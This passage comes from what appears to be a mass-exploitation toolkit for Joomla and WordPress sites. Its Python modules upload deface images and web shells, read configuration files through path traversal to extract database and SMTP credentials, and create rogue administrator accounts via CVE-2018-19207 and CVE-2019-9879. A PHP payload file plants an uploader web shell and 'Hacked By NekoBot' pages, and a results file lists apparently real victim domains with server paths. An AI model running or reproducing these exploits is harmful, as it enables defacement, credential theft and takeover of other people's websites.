10 | b = '\033[34m'
11 | m = '\033[35m'
12 | c = '\033[36m'
13 | w = '\033[37m'
14 | Jce_Deface_image = 'files/pwn.gif'
15 | 
16 | 
17 | def Exploit(site):
18 |     try:
19 |         fileindex = {'fileToUpload': open(Jce_Deface_image, 'rb')}
20 |         Exp = 'http://' + site + '/index.php?option=com_myblog&task=ajaxupload'
21 |         GoT = requests.post(Exp, files=fileindex, timeout=10, headers=Headers)
22 |         if 'success' or 'File exists' in str(GoT.content):
23 |             if '/images/pwn' in str(GoT.content):
24 |                 IndeXpath = 'http://' + site + '/images/pwn.gif'
25 |             else:
26 |                 try:
27 |                     GetPAth = re.findall("source: '(.*)'", str(GoT.content))
28 |                     IndeXpath = GetPAth[0]
29 |                 except:
30 |                     IndeXpath = 'http://' + site + '/images/pwn.gif'
31 |             CheckIndex = requests.get(IndeXpath, timeout=10, headers=Headers)
32 |             if 'GIF89a' in str(CheckIndex.content):
33 |                 with open('result/Index_results.txt', 'a') as writer:
34 |                     writer.write(IndeXpath + '\n')
35 |                 return printModule.returnYes(site, 'N/A', 'Com_MyBlog', 'Joomla')
36 |             else:
37 |                 return printModule.returnNo(site, 'N/A', 'Com_MyBlog', 'Joomla')
38 |         else:
39 |             return printModule.returnNo(site, 'N/A', 'Com_MyBlog', 'Joomla')
40 |     except:
41 |         return printModule.returnNo(site, 'N/A', 'Com_MyBlog', 'Joomla')
42 | 


--------------------------------------------------------------------------------
/Exploits/Wp_Job_Manager.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, re
 3 | from Exploits import printModule
 4 | 
 5 | Headers = {
 6 |     'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
 7 | }
 8 | Jce_Deface_image = 'files/pwn.gif'
 9 | 
10 | 
11 | def Exploit(site):
12 |     try:
13 |         Exploit = '/jm-ajax/upload_file/'
14 |         CheckVuln = requests.get('http://' + site + Exploit, timeout=5, headers=Headers)
15 |         if '"files":[]' in CheckVuln.content:
16 |             try:
17 |                 IndeXfile = {'file[]': open(Jce_Deface_image, 'rb')}
18 |                 GoT = requests.post('http://' + site + Exploit, files=IndeXfile, timeout=5, headers=Headers)
19 |                 GetIndeXpath = re.findall('"url":"(.*)"', GoT.content)
20 |                 IndeXpath = GetIndeXpath[0].split('"')[0].replace('\/', '/').split('/wp-content')[1]
21 |                 UploadedIndEX = site + '/wp-content' + IndeXpath
22 |                 Checkindex = requests.get('http://' + UploadedIndEX, timeout=5, headers=Headers)
23 |                 if 'GIF89a' in Checkindex.content:
24 |                     with open('result/Index_results.txt', 'a') as writer:
25 |                         writer.write(UploadedIndEX + '\n')
26 |                     return printModule.returnYes(site, 'N/A', 'WP Job Manager', 'Wordpress')
27 |                 else:
28 |                     return printModule.returnNo(site, 'N/A', 'WP Job Manager', 'Wordpress')
29 |             except:
30 |                 return printModule.returnNo(site, 'N/A', 'WP Job Manager', 'Wordpress')
31 |         else:
32 |             return printModule.returnNo(site, 'N/A', 'WP Job Manager', 'Wordpress')
33 |     except:
34 |         return printModule.returnNo(site, 'N/A', 'WP Job Manager', 'Wordpress')
35 | 


--------------------------------------------------------------------------------
/Exploits/Com_Fabric.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
 6 | r = '\033[31m'
 7 | g = '\033[32m'
 8 | y = '\033[33m'
 9 | b = '\033[34m'
10 | m = '\033[35m'
11 | c = '\033[36m'
12 | w = '\033[37m'
13 | TextindeX = 'files/vuln.txt'
14 | 
15 | 
16 | def Exploit(site):
17 |     try:
18 |         fileindex = {'userfile': (TextindeX, open(TextindeX, 'rb'), 'multipart/form-data')}
19 |         post_data = {
20 |             "name": "me.php",
21 |             "drop_data": "1",
22 |             "overwrite": "1",
23 |             "field_delimiter": ",",
24 |             "text_delimiter": "&quot;",
25 |             "option": "com_fabrik",
26 |             "controller": "import",
27 |             "view": "import",
28 |             "task": "doimport",
29 |             "Itemid": "0",
30 |             "tableid": "0"
31 |         }
32 |         Exp = 'http://' + site + "/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table="
33 |         requests.post(Exp, files=fileindex, data=post_data, timeout=10, headers=Headers)
34 |         Check = requests.get('http://' + site + '/media/' + TextindeX.split('/')[1], headers=Headers,
35 |                              timeout=10)
36 |         if 'Vuln!!' in str(Check.content):
37 |             with open('result/Index_results.txt', 'a') as writer:
38 |                 writer.write(site + '/media/' + TextindeX.split('/')[1] + '\n')
39 |             return printModule.returnYes(site, 'N/A', 'Com_Fabric', 'Joomla')
40 |         else:
41 |             return printModule.returnNo(site, 'N/A', 'Com_Fabric', 'Joomla')
42 |     except:
43 |         return printModule.returnNo(site, 'N/A', 'Com_Fabric', 'Joomla')
44 | 
45 | 
46 | 


--------------------------------------------------------------------------------
/files/base64RCE.txt:
--------------------------------------------------------------------------------
 1 | $check = $_SERVER['DOCUMENT_ROOT'] . "/tmp/neko.php" ;
 2 | $fp=fopen("$check","w+");
 3 | <title>Hacked By NekoBot </title>
 4 | <?php
 5 | function http_get($url){
 6 | 	$im = curl_init($url);
 7 | 	curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
 8 | 	curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
 9 | 	curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
10 | 	curl_setopt($im, CURLOPT_HEADER, 0);
11 | 	return curl_exec($im);
12 | 	curl_close($im);
13 | }
14 | $s = '<title>Hacked By NekoBot</title><?php echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';if( $_POST["_upl"] == "Upload" ) {if(@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])) { echo "<b>Shell Uploaded ! :)<b><br><br>"; }else { echo "<b>Not uploaded ! </b><br><br>"; }}?>';
15 | $check = $_SERVER['DOCUMENT_ROOT'] . "/tmp/neko.php" ;
16 | $text = $s;
17 | $open = fopen($check, 'w');
18 | fwrite($open, $text);
19 | fclose($open);
20 | if(file_exists($check)){
21 |     echo $check."</br>";
22 | }else
23 |   echo "not exits";
24 | echo "done .\n " ;
25 | $check2 = $_SERVER['DOCUMENT_ROOT'] . "/images/neko.php" ;
26 | $text2 = $s;
27 | $open2 = fopen($check2, 'w');
28 | fwrite($open2, $text2);
29 | fclose($open2);
30 | if(file_exists($check2)){
31 |     echo $check2."</br>";
32 | }else
33 |   echo "not exits2";
34 | echo "done2 .\n " ;
35 | 
36 | $check3=$_SERVER['DOCUMENT_ROOT'] . "/neko.htm" ;
37 | $text3 = 'Hacked By NekoBot';
38 | $op3=fopen($check3, 'w');
39 | fwrite($op3,$text3);
40 | fclose($op3);
41 | 
42 | 
43 | $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/neko.htm" ;
44 | $text6 = 'Hacked By NekoBot';
45 | $op6=fopen($check6, 'w');
46 | fwrite($op6,$text6);
47 | fclose($op6);
48 | @unlink(__FILE__);
49 | 


--------------------------------------------------------------------------------
/Exploits/Wp_pagelines.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | pagelinesExploitShell = 'files/settings_auto.php'
 6 | Headers = {
 7 |     'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
 8 | }
 9 | 
10 | 
11 | def Exploit(site):
12 |     try:
13 |         FileShell = {'file': open(pagelinesExploitShell, 'rb')}
14 |         PostData = {'settings_upload': "settings", 'page': "pagelines"}
15 |         Useragent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
16 |         url = "http://" + site + "/wp-admin/admin-post.php"
17 |         GoT = requests.post(url, files=FileShell, data=PostData, headers=Useragent, timeout=5)
18 |         if GoT.status_code == 200:
19 |             CheckShell = requests.get('http://' + site + '/wp-content/neko.php', timeout=5, headers=Headers)
20 |             CheckIndex = requests.get('http://' + site + '/neko.htm', timeout=5, headers=Headers)
21 |             if 'neko!!' in CheckShell.content:
22 |                 with open('result/Shell_results.txt', 'a') as writer:
23 |                     writer.write(site + '/wp-content/neko.php' + '\n')
24 |                 if 'neko!!' in CheckIndex.content:
25 |                     with open('result/Index_results.txt', 'a') as writer:
26 |                         writer.write(site + '/neko.htm' + '\n')
27 |                 return printModule.returnYes(site, 'N/A', 'Pagelines Plugin', 'Wordpress')
28 |             else:
29 |                 return printModule.returnNo(site, 'N/A', 'Pagelines Plugin', 'Wordpress')
30 |         else:
31 |             return printModule.returnNo(site, 'N/A', 'Pagelines Plugin', 'Wordpress')
32 |     except:
33 |         return printModule.returnNo(site, 'N/A', 'Pagelines Plugin', 'Wordpress')
34 | 


--------------------------------------------------------------------------------
/Exploits/CVE_2018_19207wp_gdpr_compliance.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, re, json
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | 
14 | 
15 | 
16 | 
17 | def Exploit(site, email):
18 |     try:
19 |         Ex1 = 'http://' + site + '/wp-admin/admin-ajax.php'
20 |         headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
21 |         GET = requests.get('http://' + site, headers=headers, timeout=10)
22 |         AjaxTokEN = re.findall('"ajaxSecurity":"(.*)"', str(GET.content))[0]
23 |         payload = {'action': 'wpgdprc_process_action', 'security': str(AjaxTokEN)}
24 |         payload['data'] = json.dumps({
25 |             'type': 'save_setting',
26 |             'append': False,
27 |             'option': 'new_admin_email',
28 |             'value': email,
29 |         })
30 |         GG = requests.post(Ex1, timeout=10, headers=headers, data=payload)
31 |         if '{"message":"","error":""}' in str(GG.content):
32 |             with open('result/AdminTakeover_results.txt', 'a') as writer:
33 |                 writer.write(site + '/wp-login.php --> reset Link Sended to: {}'
34 |                                     '\n------------------------------------------\n'.format(email))
35 |             return printModule.returnYes(site, 'CVE-2018-19207', 'WP GDPR Compliance', 'Wordpress')
36 |         else:
37 |             return printModule.returnNo(site, 'CVE-2018-19207', 'WP GDPR Compliance', 'Wordpress')
38 |     except:
39 |         return printModule.returnNo(site, 'CVE-2018-19207', 'WP GDPR Compliance', 'Wordpress')
40 | 


--------------------------------------------------------------------------------
/Exploits/CVE_2019_9879wp_graphql.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import json, requests
 3 | from Exploits import printModule
 4 | 
 5 | headers = {
 6 |     'Content-type': 'application/json',
 7 |     'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
 8 | }
 9 | 
10 | 
11 | def Exploit(url, email):
12 |     try:
13 |         x = url + '/graphql'
14 |         username = 'neko'
15 |         password = 'tegal1337'
16 |         response = requests.post('http://' + x, data=json.dumps({'': ''}), headers=headers)
17 |         if response.status_code == 200:
18 |             payload = {
19 |                 "query": "mutation{registerUser(input:{clientMutationId:\"UWHATM8\",email:\""+email+"\",password:\""+password+"\",username:\""+username+"\",roles:[\"administrator\"]}){clientMutationId}}"
20 |             }
21 |             response = requests.post('http://' + x, data=json.dumps(payload), headers=headers)
22 |             if response.status_code == 200 and 'UWHATM8' in str(response.content):
23 |                 with open('result/AdminTakeover_results.txt', 'a') as writer:
24 |                     writer.write(url + '/wp-login.php --> try to login and Check email: {}\n  Username: {}\n'
25 |                                        '  Password: {}\n------------------------------------------\n'
26 |                                  .format(email, username, password))
27 |                 return printModule.returnYes(url, 'CVE-2019-9879', 'WPGraphQL Add admin', 'Wordpress')
28 |             else:
29 |                 return printModule.returnNo(url, 'CVE-2019-9879', 'WPGraphQL Add admin', 'Wordpress')
30 |         else:
31 |             return printModule.returnNo(url, 'CVE-2019-9879', 'WPGraphQL Add admin', 'Wordpress')
32 |     except:
33 |         return printModule.returnNo(url, 'CVE-2019-9879', 'WPGraphQL Add admin', 'Wordpress')
34 | 


--------------------------------------------------------------------------------
/Exploits/wp_eshop_magic.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, re
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | 
14 | 
15 | def Exploit(site):
16 |     try:
17 |         Exp = 'http://' + site + \
18 |               'wp-content/plugins/eshop-magic/download.php?file=../../../../wp-config.php'
19 |         GetConfig = requests.get(Exp, timeout=5, headers=Headers)
20 |         if 'DB_PASSWORD' in GetConfig.content:
21 |             with open('result/Config_results.txt', 'a') as ww:
22 |                 ww.write('Full Config Path  : ' + Exp + '\n')
23 |             try:
24 |                 Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.content)
25 |                 Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.content)
26 |                 Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.content)
27 |                 Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.content)
28 |                 with open('result/Config_results.txt', 'a') as ww:
29 |                     ww.write(' Host:  ' + Gethost[0] + '\n' + ' user:  ' + Getuser[0] +
30 |                              '\n' + ' pass:  ' + Getpass[0] + '\n' + ' DB:    ' + Getdb[
31 |                                  0] + '\n---------------------\n')
32 |             except:
33 |                 return printModule.returnYes(site, 'N/A', 'eshop-magic', 'Wordpress')
34 |             return printModule.returnYes(site, 'N/A', 'eshop-magic', 'Wordpress')
35 |         else:
36 |             return printModule.returnNo(site, 'N/A', 'eshop-magic', 'Wordpress')
37 |     except:
38 |         return printModule.returnNo(site, 'N/A', 'eshop-magic', 'Wordpress')
39 | 


--------------------------------------------------------------------------------
/result/pwd_WordpressSites.txt:
--------------------------------------------------------------------------------
 1 | motec-ltd.eu  /homepages/43/d418112278/htdocs/wp_shop/wordpress/
 2 | motehacks.com  /home/vtbwcuhj/public_html/motehacks.com/
 3 | motbis.fr  /home/lesoffre/domains/motbis.fr/public_html/
 4 | motejyo-moteo.com  /home/motejyo/motejyo-moteo.com/public_html/
 5 | mote-skill.com  /home/winwinwin001/mote-skill.com/public_html/
 6 | motec-ltd.eu  /homepages/43/d418112278/htdocs/wp_shop/wordpress/
 7 | motehacks.com  /home/vtbwcuhj/public_html/motehacks.com/
 8 | mote-skill.com  /home/winwinwin001/mote-skill.com/public_html/
 9 | motejyo-moteo.com  /home/motejyo/motejyo-moteo.com/public_html/
10 | motejoshi.com  /home/denno-shachu/motejoshi.com/public_html/
11 | motbis.fr  /home/lesoffre/domains/motbis.fr/public_html/
12 | mote-manual.com  /home/sunnindale/mote-manual.com/public_html/
13 | mote-change.com  /home/tohokutome/mote-change.com/public_html/
14 | motealle.ir  /home/motealle/public_html/
15 | motedan.com  /home/kom1985/motedan.com/public_html/
16 | motebodys.com  /home/mlch2/motebodys.com/public_html/
17 | motegilace.co.jp  /home/motegilace/motegilace.co.jp/public_html/
18 | mote-kawaii.com  /home/xhalz/mote-kawaii.com/public_html/
19 | motejoshilesson.com  /home/akachannenne/motejoshilesson.com/public_html/
20 | mote-channel.com  /home/criticulture/mote-channel.com/public_html/
21 | motblog.net  /home/motblog/motblog.net/public_html/
22 | mote-life.net  /home/shawn123/mote-life.net/public_html/
23 | motasimbawaneh.com  /home/motasimbawaneh/public_html/
24 | mote-kenko.com  /home/motekenko/mote-kenko.com/public_html/
25 | mote-macho.com  /home/masashi27y/mote-macho.com/public_html/
26 | motelife.site  /home/daikiante23/motelife.site/public_html/
27 | motay.ru  /var/www/u8043/data/www/motay.ru/
28 | motejutu.xyz  /home/kzlabo/motejutu.xyz/public_html/
29 | motekan.com  /home/yoma0420/motekan.com/public_html/
30 | motelrus.ru  /var/www/u0599046/public_html/motelrus.ru/
31 | 


--------------------------------------------------------------------------------
/Exploits/wp_ungallery.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, re
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | 
14 | 
15 | def Exploit(site):
16 |     try:
17 |         Exp = 'http://' + site + \
18 |               '/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php'
19 |         GetConfig = requests.get(Exp, timeout=10, headers=Headers)
20 |         if 'DB_PASSWORD' in GetConfig.content:
21 |             with open('result/Config_results.txt', 'a') as ww:
22 |                 ww.write('Full Config Path  : ' + Exp + '\n')
23 |             try:
24 |                 Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.content)
25 |                 Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.content)
26 |                 Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.content)
27 |                 Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.content)
28 |                 with open('result/Config_results.txt', 'a') as ww:
29 |                     ww.write(' Host:  ' + Gethost[0] + '\n' + ' user:  ' + Getuser[0] +
30 |                              '\n' + ' pass:  ' + Getpass[0] + '\n' + ' DB:    ' + Getdb[
31 |                                  0] + '\n---------------------\n')
32 |             except:
33 |                 return printModule.returnYes(site, 'N/A', 'ungallery Plugin', 'Wordpress')
34 |             return printModule.returnYes(site, 'N/A', 'ungallery Plugin', 'Wordpress')
35 |         else:
36 |             return printModule.returnNo(site, 'N/A', 'ungallery Plugin', 'Wordpress')
37 |     except:
38 |         return printModule.returnNo(site, 'N/A', 'ungallery Plugin', 'Wordpress')
39 | 


--------------------------------------------------------------------------------
/Exploits/WpCateGory_page_icons.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | 
 6 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
 7 | r = '\033[31m'
 8 | g = '\033[32m'
 9 | y = '\033[33m'
10 | b = '\033[34m'
11 | m = '\033[35m'
12 | c = '\033[36m'
13 | w = '\033[37m'
14 | Jce_Deface_image = 'files/pwn.gif'
15 | 
16 | def Exploit(site):
17 |     try:
18 |         ChckVln = requests.get('http://' + site + '/wp-content/plugins/category-page-icons/css/menu.css',
19 |                                timeout=5, headers=Headers)
20 |         if ChckVln.status_code == 200:
21 |             Exp = 'http://' + site + '/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php'
22 |             fileDeface = {'wpdev-async-upload': open(Jce_Deface_image, 'rb')}
23 |             PostDAta = {'dir_icons': '../../../',
24 |                         'submit': 'upload'}
25 |             requests.post(Exp, files=fileDeface, data=PostDAta, timeout=5, headers=Headers)
26 |             CheckIndex = requests.get('http://' + site + '/wp-content/' + Jce_Deface_image.split('/')[1],
27 |                                       timeout=5, headers=Headers)
28 |             if 'GIF89a' in CheckIndex.content:
29 |                 with open('result/Index_results.txt', 'a') as writer:
30 |                     writer.write(site + '/wp-content/' + Jce_Deface_image.split('/')[1] + '\n')
31 |                 return printModule.returnYes(site, 'N/A', 'category-page-icons', 'Wordpress')
32 |             else:
33 |                 return printModule.returnNo(site, 'N/A', 'category-page-icons', 'Wordpress')
34 |         else:
35 |             return printModule.returnNo(site, 'N/A', 'category-page-icons', 'Wordpress')
36 |     except:
37 |         return printModule.returnNo(site, 'N/A', 'category-page-icons', 'Wordpress')
38 | 


--------------------------------------------------------------------------------
/Exploits/Com_alberghi.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
 6 | r = '\033[31m'
 7 | g = '\033[32m'
 8 | y = '\033[33m'
 9 | b = '\033[34m'
10 | m = '\033[35m'
11 | c = '\033[36m'
12 | w = '\033[37m'
13 | Jce_Deface_image = 'files/pwn.gif'
14 | 
15 | def Exploit(site):
16 |     try:
17 |         fileDeface = {'userfile': open(Jce_Deface_image, 'rb')}
18 |         Exp = 'http://' + site + '/administrator/components/com_alberghi/upload.alberghi.php'
19 |         Check = requests.get(Exp, timeout=10, headers=Headers)
20 |         if 'class="inputbox" name="userfile"' in str(Check.content):
21 |             Post = requests.post(Exp, files=fileDeface, timeout=10, headers=Headers)
22 |             if 'has been successfully' or 'already exists' in str(Post.content):
23 |                 CheckIndex = requests.get(site + '/administrator/components/com_alberghi/' +
24 |                                           Jce_Deface_image.split('/')[1], timeout=10, headers=Headers)
25 |                 if 'GIF89a' in str(CheckIndex.content):
26 |                     with open('result/Index_results.txt', 'a') as writer:
27 |                         writer.write(site + '/administrator/components/com_alberghi/' +
28 |                                      Jce_Deface_image.split('/')[1] + '\n')
29 |                     return printModule.returnYes(site, 'N/A', 'Com_alberghi', 'Joomla')
30 |                 return printModule.returnYes(site, 'N/A', 'Com_alberghi', 'Joomla')
31 |             else:
32 |                 return printModule.returnNo(site, 'N/A', 'Com_alberghi', 'Joomla')
33 |         else:
34 |             return printModule.returnNo(site, 'N/A', 'Com_alberghi', 'Joomla')
35 |     except:
36 |         return printModule.returnNo(site, 'N/A', 'Com_alberghi', 'Joomla')
37 | 


--------------------------------------------------------------------------------
/Exploits/Wp_addblockblocker.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, time
 3 | from Exploits import printModule
 4 | 
 5 | pagelinesExploitShell = 'files/settings_auto.php'
 6 | Headers = {
 7 |     'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
 8 | }
 9 | year = time.strftime("%y")
10 | month = time.strftime("%m")
11 | 
12 | def Exploit(site):
13 |     try:
14 |         ShellFile = {'popimg': open(pagelinesExploitShell, 'rb')}
15 |         Exp = 'http://' + site + '/wp-admin/admin-ajax.php?action=getcountryuser&cs=2'
16 |         requests.post(Exp, files=ShellFile, timeout=10, headers=Headers)
17 |         CheckShell = 'http://' + site + '/wp-content/uploads/20' + year + '/' + month + '/' \
18 |                      + pagelinesExploitShell.split('/')[1]
19 |         GoT = requests.get(CheckShell, timeout=10, headers=Headers)
20 |         if GoT.status_code == 200:
21 |             CheckShell = requests.get('http://' + site + '/wp-content/neko.php', timeout=10, headers=Headers)
22 |             CheckIndex = requests.get('http://' + site + '/neko.htm', timeout=10, headers=Headers)
23 |             if 'neko!!' in CheckShell.content:
24 |                 with open('result/Shell_results.txt', 'a') as writer:
25 |                     writer.write(site + '/wp-content/neko.php' + '\n')
26 |                 if 'neko!!' in CheckIndex.content:
27 |                     with open('result/Index_results.txt', 'a') as writer:
28 |                         writer.write(site + '/neko.htm' + '\n')
29 |                 return printModule.returnYes(site, 'N/A', 'addblockblocker', 'Wordpress')
30 |             else:
31 |                 return printModule.returnNo(site, 'N/A', 'addblockblocker', 'Wordpress')
32 |         else:
33 |             return printModule.returnNo(site, 'N/A', 'addblockblocker', 'Wordpress')
34 |     except:
35 |         return printModule.returnNo(site, 'N/A', 'addblockblocker', 'Wordpress')
36 | 


--------------------------------------------------------------------------------
/Exploits/Com_Macgallery.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, re
 3 | from Exploits import printModule
 4 | from Tools import getSMTP
 5 | 
 6 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
 7 | r = '\033[31m'
 8 | g = '\033[32m'
 9 | y = '\033[33m'
10 | b = '\033[34m'
11 | m = '\033[35m'
12 | c = '\033[36m'
13 | w = '\033[37m'
14 | 
15 | def Exploit(site):
16 |     try:
17 |         Exp = 'http://' + site + '/index.php?option=com_macgallery&view=download&albumid=../../configuration.php'
18 |         GetConfig = requests.get(Exp, timeout=10, headers=Headers)
19 |         if 'JConfig' in str(GetConfig.content):
20 |             with open('result/Config_results.txt', 'a') as ww:
21 |                 ww.write('Full Config Path  : ' + Exp + '\n')
22 |             try:
23 |                 Gethost = re.findall("host = '(.*)';", str(GetConfig.content))
24 |                 Getuser = re.findall("user = '(.*)';", str(GetConfig.content))
25 |                 Getpass = re.findall("password = '(.*)';", str(GetConfig.content))
26 |                 Getdb = re.findall("db = '(.*)';", str(GetConfig.content))
27 |                 with open('result/Config_results.txt', 'a') as ww:
28 |                     ww.write(' Host:  ' + Gethost[1] + '\n' + ' user:  ' + Getuser[1] +
29 |                              '\n' + ' pass:  ' + Getpass[0] + '\n' + ' DB:    ' + Getdb[
30 |                                  0] + '\n---------------------\n')
31 |                 getSMTP.GETSmtpJoomConf(str(GetConfig.content))
32 |             except:
33 |                 return printModule.returnYes(site, 'N/A', 'Com_Macgallery', 'Joomla')
34 |             return printModule.returnYes(site, 'N/A', 'Com_Macgallery', 'Joomla')
35 |         else:
36 |             return printModule.returnNo(site, 'N/A', 'Com_Macgallery', 'Joomla')
37 |     except:
38 |         return printModule.returnNo(site, 'N/A', 'Com_Macgallery', 'Joomla')
39 | 


--------------------------------------------------------------------------------
/Exploits/Com_CCkJseblod.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, re
 3 | from Exploits import printModule
 4 | from Tools import getSMTP
 5 | 
 6 | 
 7 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
 8 | r = '\033[31m'
 9 | g = '\033[32m'
10 | y = '\033[33m'
11 | b = '\033[34m'
12 | m = '\033[35m'
13 | c = '\033[36m'
14 | w = '\033[37m'
15 | 
16 | 
17 | def Exploit(site):
18 |     try:
19 |         Exp = 'http://' + site + '/index.php?option=com_cckjseblod&task=download&file=configuration.php'
20 |         GetConfig = requests.get(Exp, timeout=10, headers=Headers)
21 |         if 'JConfig' in str(GetConfig.content):
22 |             with open('result/Config_results.txt', 'a') as ww:
23 |                 ww.write('Full Config Path  : ' + Exp + '\n')
24 |             try:
25 |                 Gethost = re.findall("host = '(.*)';", str(GetConfig.content))
26 |                 Getuser = re.findall("user = '(.*)';", str(GetConfig.content))
27 |                 Getpass = re.findall("password = '(.*)';", str(GetConfig.content))
28 |                 Getdb = re.findall("db = '(.*)';", str(GetConfig.content))
29 |                 with open('result/Config_results.txt', 'a') as ww:
30 |                     ww.write(' Host:  ' + Gethost[1] + '\n' + ' user:  ' + Getuser[1] +
31 |                              '\n' + ' pass:  ' + Getpass[0] + '\n' + ' DB:    ' + Getdb[
32 |                                  0] + '\n---------------------\n')
33 |                 getSMTP.GETSmtpJoomConf(str(GetConfig.content))
34 |             except:
35 |                 return printModule.returnYes(site, 'N/A', 'Com_CCkJseblod', 'Joomla')
36 |             return printModule.returnYes(site, 'N/A', 'Com_CCkJseblod', 'Joomla')
37 | 
38 |         else:
39 |             return printModule.returnNo(site, 'N/A', 'Com_CCkJseblod', 'Joomla')
40 |     except:
41 |         return printModule.returnNo(site, 'N/A', 'Com_CCkJseblod', 'Joomla')
42 | 


--------------------------------------------------------------------------------
/Exploits/cherry_plugin.py:
--------------------------------------------------------------------------------
 1 | 
 2 | import requests, re
 3 | from Exploits import printModule
 4 | pagelinesExploitShell = 'files/settings_auto.php'
 5 | Headers = {
 6 |     'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
 7 | }
 8 | 
 9 | 
10 | def Exploit(site):
11 |     try:
12 |         ShellFile = {'file': (pagelinesExploitShell, open(pagelinesExploitShell, 'rb')
13 |                               , 'multipart/form-data')}
14 |         Exp = 'http://' + site + '/wp-content/plugins/cherry-plugin/admin/import-export/upload.php'
15 |         requests.post(Exp, files=ShellFile, timeout=10, headers=Headers)
16 |         Shell = 'http://' + site + '/wp-content/plugins/cherry-plugin/admin/import-export/' \
17 |                 + pagelinesExploitShell.split('/')[1]
18 |         GoT = requests.get(Shell, timeout=10, headers=Headers)
19 |         if GoT.status_code == 200:
20 |             CheckShell = requests.get('http://' + site + '/wp-content/neko.php', timeout=10, headers=Headers)
21 |             CheckIndex = requests.get('http://' + site + '/neko.htm', timeout=10, headers=Headers)
22 |             if 'Vuln!!' in str(CheckShell.content):
23 |                 with open('result/Shell_results.txt', 'a') as writer:
24 |                     writer.write(site + '/wp-content/neko.php' + '\n')
25 |                 if 'Vuln!!' in str(CheckIndex.content):
26 |                     with open('result/Index_results.txt', 'a') as writer:
27 |                         writer.write(site + '/neko.htm' + '\n')
28 |                 return printModule.returnYes(site, 'N/A', 'Wordpress Cherry-plugin', 'Wordpress')
29 |             else:
30 |                 return printModule.returnNo(site, 'N/A', 'Wordpress Cherry-plugin', 'Wordpress')
31 |         else:
32 |             return printModule.returnNo(site, 'N/A', 'Wordpress Cherry-plugin', 'Wordpress')
33 |     except:
